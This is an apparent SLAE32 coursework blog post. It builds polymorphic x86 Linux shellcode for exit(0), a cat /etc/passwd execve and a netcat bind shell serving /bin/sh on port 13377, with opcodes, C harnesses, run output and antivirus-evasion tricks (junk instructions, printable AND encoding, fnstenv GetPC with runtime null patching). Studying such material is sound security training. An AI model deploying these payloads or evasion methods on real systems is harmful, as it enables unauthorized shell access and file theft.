SLAE32 Assignment 6 - Polymorphic Shellcode

This post introduces the 6th mission of my SLAE32 journey.

If the previous assignment was incredible, this one was even cooler because I could apply what I learned in the Msfvenom analysis assignment to develop polymorphic versions of existing shellcodes.

Some existing tools, such as ADMutate, will XOR-encrypt the existing shellcode and attach the loader code to it. This is useful, but writing polymorphic shellcodes without a tool is a much better learning experience.

Introduction

The task for the 6th SLAE32 assignment is to select three shellcode payloads from Shell-Storm and create polymorphic versions of them without increasing the size of each shellcode by more than 50%.

Bonus points if we can make it shorter in length compared to the original.

Shellcode 1 - sys_exit(0)

This shellcode was written by gunslinger_, and is located here. This shellcode only calls exit() with 0 as exit code.

Size: 8 bytes

/*
Name   : 8 bytes sys_exit(0) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

char *bye=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x01"                    /* mov    $0x1,%al */
 "\x31\xdb"                    /* xor    %ebx,%ebx */
 "\xcd\x80";                   /* int    $0x80 */

int main(void)
{
		((void (*)(void)) bye)();
		return 0;
}

This is a very short shellcode, so there are few alternatives to work with.

global _start

section .text
_start:

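xor ebx, ebx    ; clear ebx (exit status 0)
mul ebx         ; edx:eax = eax * ebx = 0, so eax and edx are cleared
inc eax         ; eax = 1, the sys_exit syscall number
syscall         ; opcode 0f 05; not valid in 32-bit mode on Intel CPUs, int 0x80 (cd 80) is the portable 2-byte equivalent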
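
To see why `mul ebx` clears both registers, here is a minimal Python model of the 32-bit unsigned multiply. It is a sketch for illustration only, and the helper name `mul32` is made up for this example. `mul` writes the 64-bit product of eax and its operand to edx:eax, so multiplying by a zeroed ebx clears eax and edx whatever eax held before.

```python
MASK32 = 0xFFFFFFFF

def mul32(eax: int, operand: int) -> tuple[int, int]:
    """Model x86 `mul r32`: return (edx, eax) holding the 64-bit product."""
    product = (eax & MASK32) * (operand & MASK32)
    return (product >> 32) & MASK32, product & MASK32

# eax holds an arbitrary leftover value; ebx was cleared by `xor ebx, ebx`.
edx, eax = mul32(0xDEADBEEF, 0)
eax += 1  # `inc eax`: eax becomes 1, the sys_exit syscall number
print(hex(edx), hex(eax))
```

The same trick costs 2 bytes (f7 e3) and replaces both `xor eax, eax` and a separate clearing of edx.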

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ../../../../assembler.sh 7-byte-poly_sys_exit.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 7

"\x31\xdb\xf7\xe3\x40\x0f\x05"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode, so we are good to go and can paste it into our shellcode.c program.
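
The null-byte check can also be scripted instead of done by eye. The snippet below is a small sketch, with `has_null` being a helper name invented for this example. It matters for our C harness too, because `strlen` stops at the first zero byte and would report a truncated length.

```python
# Bytes printed by assembler.sh for the 7-byte exit shellcode.
shellcode = bytes.fromhex("31dbf7e3400f05")

def has_null(code: bytes) -> bool:
    """Return True if the shellcode contains at least one 0x00 byte."""
    return 0 in code

print(len(shellcode), has_null(shellcode))
```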

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x40\x0f\x05";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 7

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ echo $?
0

Size: 7 bytes

We saved 1 byte, which is a 12.5% reduction in size compared to the original.

Shellcode 2 - cat passwd Shellcode

This shellcode was written by fb1h2s, and is located here. This shellcode will read the /etc/passwd file.

Size: 43 bytes

#include <stdio.h>
 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // push dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
 
int main()
{
(*(void (*)()) shellcode)();
 
return 0;
}
 
 
/*
shellcode[]=	"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" 
		"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

We will use the assembly comments to understand what the code is doing. It appears to use some tricks we have already seen in past assignments, so we'll add junk instructions to disguise them a bit.


global _start
section .text
_start:
        mov eax, -1             ; put 0xffffffff in eax
        inc eax                 ; eax becomes zero
        cdq                     ; zeroes edx
        lea ebx, [esp-0xc]      ; ebx = address where "/bin/cat" will sit after the next three pushes
        push edx
        push dword 0x7461632f   ; tac/
        push dword 0x6e69622f   ; nib/
        
        lea ecx, [ebx-0x10]     ; use ebx as our "stack pointer"
        
        push edx
        push dword 0x64777374   ; dwst - changes a 's' for a 't'
        push dword 0x61702f2f   ; ap//
        push dword 0x6374652f   ; cte/

        mov ax, 0x4a2f          ; first AND operand, no null bytes

        push edx
        xor byte [esp+0xc], 0x7 ; 0x74 ('t') xor 0x7 = 0x73 ('s')
        push ecx
        push ebx
        mov ecx, esp
        and ax, 0x358b          ; ax = 0x4a2f and 0x358b = 0x000b (execve) without null bytes
        int 0x80

At the start of the code, eax and edx are zeroed. A few instructions later we push the path with one letter changed, /etc//patswd instead of /etc//passwd, and afterwards we patch the t back to an s with an XOR.
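
The path patching can be replayed outside the debugger. This is a sketch in Python that rebuilds the string from the three pushed dwords and applies the same XOR. The variable names are made up for the example, and the offset arithmetic assumes the stack layout described in the comments.

```python
import struct

# Dwords in the order the shellcode pushes them. The last push ends up at
# the lowest address, so memory order is the reverse of push order.
pushes = [0x64777374, 0x61702F2F, 0x6374652F]
path = bytearray(b"".join(struct.pack("<I", d) for d in reversed(pushes)))
before = bytes(path)

# `xor byte [esp+0xc], 0x7` runs after one more 4-byte `push edx`,
# so esp+0xc is offset 0xc - 4 = 8 from the start of the string.
path[0xC - 4] ^= 0x07
after = bytes(path)

print(before, after)
```

Only the byte at offset 8 changes, so a signature looking for the literal /etc//passwd dwords in the shellcode no longer matches.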

The coolest trick here is the use of AND operations to set eax. It is a fun challenge because it is an alternative to XOR operations. With printable operands, an AND instruction such as and eax, imm32 (opcode 0x25, the '%' character) assembles entirely into the printable ASCII range (from 0x33 to 0x7e). XOR-based zeroing such as xor eax, eax assembles to 31 c0, and 0xc0 is not in the printable ASCII range.

Some buffers don’t allow unprintable characters. This way we can exploit what was previously unexploitable.

Let’s use an example to show how it works.

ASCII Printable Polymorphic Shellcode

The AND logic table transforms bits as follows:

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Because the only case where the result is a 1 is when both bits are 1, if two inverse values are ANDed onto EAX, EAX will become zero.

Binary                                    Hexadecimal
    01000101 01001110 01001111 01001010       0x454e4f4a
AND 00111010 00110001 00110000 00110101   AND 0x3a313035
---------------------------------------   --------------
    00000000 00000000 00000000 00000000       0x00000000

In this technique the two printable 32-bit values have no set bit in common: within each byte they are bitwise inverses of each other in the low seven bits, and the top bit is zero in both.

What’s the advantage?

eax can be zeroed without using null bytes, and the assembled machine code is printable text.

From https://www.dmi.unipg.it/~bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
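
The claim is easy to verify with a few lines of Python. This is a sketch, with `is_printable` being a helper name invented here, and it assumes the usual printable ASCII range 0x20 to 0x7e.

```python
a, b = 0x454E4F4A, 0x3A313035

def is_printable(value: int, width: int = 4) -> bool:
    """True if every byte of `value` is in the printable ASCII range 0x20-0x7e."""
    return all(0x20 <= byte <= 0x7E for byte in value.to_bytes(width, "little"))

zeroed = a & b
print(hex(zeroed), is_printable(a), is_printable(b))
# The operands as they appear in memory (little-endian).
print(a.to_bytes(4, "little"), b.to_bytes(4, "little"))
```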

Getting back to our exercise, let’s use our code to demonstrate how we leverage this technique for our purpose.

The instructions used with this technique are as follows:

mov ax, 0x4a2f
and ax, 0x358b

The goal is for eax to end up holding 0xb (the execve syscall number). Let's see why we used these values for the AND operation and what the result is.

Binary                    Hexadecimal
    0100 1010 0010 1111       0x4a2f
AND 0011 0101 1000 1011   AND 0x358b
-----------------------  -------------
    0000 0000 0000 1011       0x000b

The high bytes of the two values share no set bits, so they AND to zero, while the low bytes AND to 0xb, the execve syscall number.
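
A quick check of the arithmetic, plus a small search for alternative operands, can be sketched in Python. Note that the pair used here is null-free but not fully printable, since 0x8b is above 0x7e. The helper `printable_pairs` is hypothetical and assumes the full printable range 0x20 to 0x7e rather than the narrower 0x33 to 0x7e quoted earlier.

```python
PRINTABLE = range(0x20, 0x7F)

def printable_pairs(target: int):
    """Yield pairs of printable bytes (x, y) such that x & y == target."""
    for x in PRINTABLE:
        for y in PRINTABLE:
            if x & y == target:
                yield x, y

result = 0x4A2F & 0x358B              # the pair used in the shellcode
low_is_printable = 0x8B in PRINTABLE  # 0x8b lies outside printable ASCII
x, y = next(printable_pairs(0x0B))    # one fully printable pair for the low byte
print(hex(result), low_is_printable, hex(x), hex(y))
```

Any pair yielded by the search could replace 0x2f and 0x8b if a fully printable low byte were required.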

Would an antivirus or a human be able to spot this just by looking at it?

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ../../../assembler.sh cat_passwd.nasm                              

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 61

"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode, so we are good to go and can paste it into our shellcode.c program.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 61
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:113:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:108:117:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:109:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:111:120::/var/lib/saned:/usr/sbin/nologin
colord:x:112:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
edu:x:1000:1000:edu:/home/edu:/usr/bin/zsh

Size: 61 bytes

The size increased by 18 bytes, which is 41.9% more than the original.

Shellcode 3 - nc -lvve/bin/sh -p13377

This was by far the most challenging exercise I had during the course.

At some point, I turned it into a personal thing because I decided to put the techniques I learned from the msfvenom shellcode analysis assignment into this exercise, and nothing seemed to work.

One constraint I needed to get around was that I had generated the msfvenom shellcodes with null bytes.

I couldn't use null bytes this time, so I needed to review how msfvenom generates shellcode without null bytes and try to apply that methodology to this task.

So I will present two polymorphic versions of this shellcode: one with null bytes and one that is null-free.

Then, we can compare the differences between them and reflect on how hard it is to develop a null-free shellcode.

The following quote captures the mindset we need in order not to give up when facing a complex problem, and sums up how difficult it was for me to make this work.

  Intelligence is the ability to adapt to change,
                                                by Stephen Hawking

After this, let’s get to the point.

This shellcode was written by an Anonymous user, and is located here. As the shellcode description says, this shellcode will listen on port 13377 using netcat and give /bin/sh to the connecting attacker.

The original shellcode does not have any comments, so I added some to make its internals easier to understand.

Size: 64 bytes (0x8048060 through 0x804809f in the objdump listing below)

linux x86 nc -lvve/bin/sh -p13377 shellcode
This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
Author: Anonymous
Site: http://chaossecurity.wordpress.com/
Here is code written in NASM
/////////////////////////////
section .text
    global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333	; 7733
push 0x3170762d	; 1pv-
mov edx, esp
push eax
push 0x68732f6e	; hs/n
push 0x69622f65	; ib/e
push 0x76766c2d	; vvl-
mov ecx,esp
push eax
push 0x636e2f2f	; cn//
push 0x2f2f2f2f	; ////
push 0x6e69622f	; nib/
mov ebx, esp
push eax
push edx
push ecx
push ebx
xor edx,edx
mov  ecx,esp
mov al,11		; execve syscall
int 0x80
//////////////////////////////////
And here is objdump from which you can see the shellcode
//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out
a.out:     file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   31 d2                   xor    %edx,%edx
 8048064:   68 33 33 37 37          push   $0x37373333
 8048069:   68 2d 76 70 31          push   $0x3170762d
 804806e:   89 e2                   mov    %esp,%edx
 8048070:   50                      push   %eax
 8048071:   68 6e 2f 73 68          push   $0x68732f6e
 8048076:   68 65 2f 62 69          push   $0x69622f65
 804807b:   68 2d 6c 76 76          push   $0x76766c2d
 8048080:   89 e1                   mov    %esp,%ecx
 8048082:   50                      push   %eax
 8048083:   68 2f 2f 6e 63          push   $0x636e2f2f
 8048088:   68 2f 2f 2f 2f          push   $0x2f2f2f2f
 804808d:   68 2f 62 69 6e          push   $0x6e69622f
 8048092:   89 e3                   mov    %esp,%ebx
 8048094:   50                      push   %eax
 8048095:   52                      push   %edx
 8048096:   51                      push   %ecx
 8048097:   53                      push   %ebx
 8048098:   31 d2                   xor    %edx,%edx
 804809a:   89 e1                   mov    %esp,%ecx
 804809c:   b0 0b                   mov    $0xb,%al
 804809e:   cd 80                   int    $0x80

As I said above, I took a completely different approach from others for this exercise.

The inspiration was the methodology used by the previously analyzed msfvenom shellcodes.

I will first present the shellcode with null bytes.

Null Byte Shellcode

xor eax, eax
cdq

call $+ 0xf
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx

call $ + 0x13
sub   eax,0x6576766c
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
add    byte [eax], al
pop ecx

call $ + 0x12
das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],ax
pop ebx

push eax
push edx
push ecx
push ebx

mov eax, 0x454e4a2f
;add ax, 0x1000

xor edx,edx
mov  ecx,esp
and eax,0x3a31358b
int 0x80

Let’s divide and conquer one more time.

The code is divided into parts, one for each command-line argument that execve will receive.

A call and a pop instruction delimit each part. The bytes in between are the argument itself. The call pushes the address of those bytes onto the stack, and the pop $Register instruction moves that address from the stack into the register assigned to that argument.

4th argument - pop edx ("-vp13377")
3rd argument - pop ecx ("-lvve/bin/sh")
2nd argument - pop ebx ("/bin//////nc")
1st argument - eax (zero, set by xor eax, eax; it needs no pop)

So the pop instruction tells us which execve argument was being prepared. The syscall arguments are prepared exactly as in the original, but with obfuscated code.

For example:

xor eax, eax            
cdq                     

call $+ 0xf				; Start
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al
pop edx					; end

call $+0xf tells us we are looking at a “piece” of code that prepares the 4th argument, because this part ends with pop edx.

The instructions between the call and the pop look like nonsense that the CPU will execute, but this is not the case: the call jumps over them, so they are never executed and serve only as data.

By this time, you should be familiar with the x86 calling conventions and how the call instruction behaves.

Just a reminder, the call instruction pushes the return address (address immediately after the call instruction) on the stack and changes the eip to the call destination. This effectively transfers control to the call target and begins execution there.

So what are these instructions doing exactly?

xor eax, eax            ; zeroes eax
cdq                     ; zeroes edx (saves space)

call $ + 0xf				; jumps to pop edx
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al     
pop edx             	; saving execve 4th argument

First, we clear the eax and edx registers. Then the call pushes the address of the following instruction onto the stack and jumps to the pop edx instruction.

Why $ + 0xf?

Well, $ holds the address of the current instruction. As an example, let’s compare the code above with its disassembly from objdump -M intel -d netcat_nullbyte_shellcode

xor eax, eax
cdq

call $+ 0xf             ; $ holds address of call opcode
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx
---
08049000 <_start>:
 8049000:       31 c0                   xor    eax,eax
 8049002:       99                      cdq    
 8049003:       e8 0a 00 00 00          call   8049012 <_start+0x12>
 8049008:       2d 76 70 31 33          sub    eax,0x33317076
 804900d:       33 37                   xor    esi,DWORD PTR [edi]
 804900f:       37                      aaa    
 8049010:       00 00                   add    BYTE PTR [eax],al
 8049012:       5a                      pop    edx

Counting the opcode bytes (2nd column), there is a distance of 15 bytes (0xf) between the call instruction and pop edx.

Notice how the call instruction introduces null bytes when the target is only a short distance ahead: the 32-bit displacement 0x0000000a is encoded as 0a 00 00 00.
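
The relationship between `$ + 0xf` and the encoded displacement can be worked out in Python. This is a sketch using the addresses from the objdump listing; a near call (opcode e8) stores its target relative to the address of the next instruction, which is 5 bytes after the call opcode.

```python
import struct

call_addr = 0x8049003   # address of the call opcode in the listing
target = 0x8049012      # address of `pop edx`
CALL_LEN = 5            # e8 plus a 4-byte displacement

distance = target - call_addr            # what `$ + 0xf` expresses in NASM
rel32 = target - (call_addr + CALL_LEN)  # what the CPU actually encodes
encoding = b"\xe8" + struct.pack("<i", rel32)
backward = struct.pack("<i", -10)        # a short backward displacement, for comparison

print(hex(distance), hex(rel32), encoding.hex(" "), backward.hex(" "))
```

A short forward displacement is padded with zero bytes, while a short backward one is padded with ff bytes, which is why the classic jmp-call-pop layout places the call after its target.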

So edx ends up pointing at the same bytes as in the original shellcode, but the bytes live inside the code itself instead of being placed on the stack with push instructions.

Approach 1 - Original shellcode

; Remember that these are stored in little-endian format

push 0x37373333
push 0x3170762d

Approach 2 - Polymorphic version

We place exactly the same bytes in the code as opcodes and put the address of the first byte in edx.

2d 76 70 31 33          sub    eax,0x33317076
33 37                   xor    esi,DWORD PTR [edi]
37                      aaa
00 00                   add    BYTE PTR [eax],al

Hex bytes: **0x2D, 0x76, 0x70, 0x31, 0x33, 0x33, 0x37, 0x37**, 0x00, 0x00

Comparing both approaches, we see they produce exactly the same bytes. We can check this with gdb.
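
The same comparison can be done without a debugger. Below is a sketch in Python that packs the two dwords pushed by the original shellcode and compares them with the opcode bytes of sub, xor and aaa taken from the objdump listing of the null-byte version.

```python
import struct

# Approach 1: dwords pushed by the original shellcode. The last push
# (0x3170762d) sits at the lowest address, so it comes first in memory.
pushed = struct.pack("<II", 0x3170762D, 0x37373333)

# Approach 2: opcode bytes of `sub eax, imm32`, `xor esi, [edi]` and `aaa`.
inline = bytes.fromhex("2d76703133" "3337" "37")

print(pushed, inline, pushed == inline)
```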

Approach 2 has the disadvantage of introducing null bytes, because the string terminator has to be embedded in the code (and the forward call adds more), while with Approach 1 we push a zeroed register, which adds no null bytes to the shellcode.

This is why I struggled with Approach 2 and why I needed to rethink and completely change my approach to avoid null bytes.

Null-Free Shellcode


xor eax,eax

mov al, 0x8
fnop
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; nops will be changed to nulls in runtime

lea edx, [esi+4]

mov al, 0xc
fnop
jmp short argParser

sub   eax,0x6576766c    ; \xe8\x0e\x00\x00\x00
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
nop


lea ecx, [esi+4]

;call $ + 0x12   ;\xe8\x0d\x00\x00\x00

mov al, 0xc
fnop
jmp short argParser

das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx

lea ebx, [esi+4]

push eax
push edx
push ecx
push ebx

cdq             ; eax is zero here, so cdq clears edx (execve's envp argument --> char *const envp[])
mov  ecx,esp
mov al, 0xb
int 0x80

argParser:          ; similar to jmp-call-pop, but patches the placeholder byte at the end of
                    ; the string with a null, assuming al holds the right distance
    fnstenv [esp-0xc]
    pop esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

The idea is the same as Approach 2 from the Null Byte shellcode, but this version uses the fnstenv technique from the x87 FPU to obtain the address of the last executed FPU instruction instead of using call. This technique was mentioned during the course, but understanding how to use it required some research of our own.

The logic had to be completely redesigned to get the shellcode working with this technique.

The FNSTENV Technique

There are alternative methods in shellcode for finding the value of the EIP register using instructions that contain no null bytes. One of those methods uses an FPU instruction.

Below is the image from the FPU section in Intel’s manual that shows how the FPU environment is organized in memory.

When the fnstenv instruction is preceded by some other FPU instruction (in our case, fnop), fnstenv writes the FPU environment to its memory operand, and that environment includes the address of the previous FPU instruction. With the operand [esp-0xc], the instruction pointer field (at offset 0xc in the environment) lands exactly at the top of the stack, so a pop retrieves it.

For this exercise, I used the fnop instruction. fldz or another FPU instruction would work as well. Just make sure it is an FPU instruction.

PoC code with `fnstenv`

l1: fnop
  fnstenv [esp-0xc]  ; FPU Instruction Pointer (FIP) ends up at [esp]
  pop eax
l2: ...

The result of the above two FPU instructions is that the address of the fnop instruction gets saved onto the stack.

When l2 is reached, the value in the eax register will be the address of l1.
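
Why the operand is esp-0xc becomes clearer with the field offsets written down. The sketch below lists the 28-byte environment that fnstenv stores in 32-bit protected mode and computes where the FIP field lands. The dictionary keys, the `fip_slot` helper and the stack pointer value are made up for illustration.

```python
# Field offsets of the 28-byte FPU environment written by fnstenv
# (32-bit protected-mode format).
FPU_ENV = {
    "control_word": 0x00,
    "status_word": 0x04,
    "tag_word": 0x08,
    "fip": 0x0C,         # address of the last non-control FPU instruction
    "fcs_opcode": 0x10,
    "fdp": 0x14,
    "fds": 0x18,
}

def fip_slot(esp: int, displacement: int = -0xC) -> int:
    """Address where FIP is written by `fnstenv [esp + displacement]`."""
    return esp + displacement + FPU_ENV["fip"]

esp = 0xBFFFF000  # hypothetical stack pointer, for illustration only
print(hex(fip_slot(esp)), fip_slot(esp) == esp)
```

Because the displacement cancels the field offset, the very next pop reads FIP. The rest of the environment overwrites the 12 bytes below esp and the 16 bytes starting at esp, so nothing valuable should be stored there when fnstenv runs.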

Debugging fnstenv

Debugging the code with the fnstenv technique drove me completely mad.

I figured out that single-stepping over the fnop instruction results in a completely different value being popped into the register. This means the code can behave differently, in a very subtle way, under a debugger.

So, the solution was to place one breakpoint on fnop and another on the instruction after fnstenv, which in our code is pop esi.

mov al, 0x8
fnop                                ; breakpoint here
jmp short argParser
[...]
argParser:          

    fnstenv [esp-0xc]
    pop esi                         ; breakpoint here
    mov byte [esi + 0x4 + eax], ah 
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

Between these instructions I executed the program normally to avoid the unstable behaviour fnstenv causes when performing single-step debugging.

Debug section taken from VirtualPC-specific section in https://www.virusbulletin.com/virusbulletin/2010/11/anti-unpacker-tricks-part-fourteen

Methodology

As with the previous shellcode, the code is divided into parts, one for each argument of the command to be executed by execve.

This time each part is delimited by mov, fnop, jmp and lea instructions. The bytes between them hold one of execve’s arguments.

The mov, fnop and jmp instructions set things up so that argParser can recover the address of the argument bytes and terminate them.

The lea $REGISTER, [esi+4] instruction loads the address of the argument bytes (esi+4, just past the fnop and jmp opcodes) into the register assigned to that argument.

So the lea instruction tells us which execve argument was being prepared.

Let’s take a “piece” of code for one of the arguments from our shellcode and dig into it.

We’ll be analyzing what we put in the edx register.

; start of edx section argument
mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction; the FPU records its address as the FPU instruction pointer
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; avoid null byte. changed in runtime to null

lea edx, [esi+4]
; end of edx section argument
;----------------------------------------
; starting preparing next argument
mov al, 0xc

[...]

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we move into al the distance from the first byte of the argument (the one edx will point to) to the nop instruction. We don’t count the fnop and jmp opcodes because they are the same size in every argument section, so they are accounted for in the argParser branch (the constant 0x4).

We can use objdump to verify that the distance between sub eax,0x33317076, and nop is 8 bytes.


8049004:       d9 d0                   fnop
8049006:       eb 43                   jmp    804904b <argParser>
8049008:       2d 76 70 31 33          sub    eax,0x33317076
804900d:       33 37                   xor    esi,DWORD PTR [edi]
804900f:       37                      aaa
8049010:       90                      nop

0x8049010 - 0x8049008 = 0x8 bytes

Then, we execute an FPU instruction (fnop) so that the FPU records its address. This address will be the reference for our further actions. Next, we jump to the argParser branch.

mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction; the FPU records its address as the FPU instruction pointer
jmp short argParser

This branch is where all the magic happens.

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we store the fnop address on the stack and put that address in the esi register.

Then, remember that nop (0x90) byte we put at the end of the argument section?

We need a null byte at the end of the string, but we can’t put it there explicitly. So we change the nop into a null byte at runtime with the following single instruction:

mov byte [esi + 0x4 + eax], ah  ; ah is always zero

Basically, we are moving ah, the eight most significant bits of ax, to the address of the nop byte. We know that ah is always zero because eax is cleared by xor eax, eax at the beginning of the shellcode and again in the argParser branch, and each argument section only writes to al. So the ah byte is never touched by our operations.

This way, a null byte is placed in the argument bytes marking the end of the string bytes.

Let’s demonstrate it in gdb.

After changing 0x90 to 0x00, three new instructions appeared.

That null byte also changed the fnstenv instruction.

What a difference a single byte can make, right?

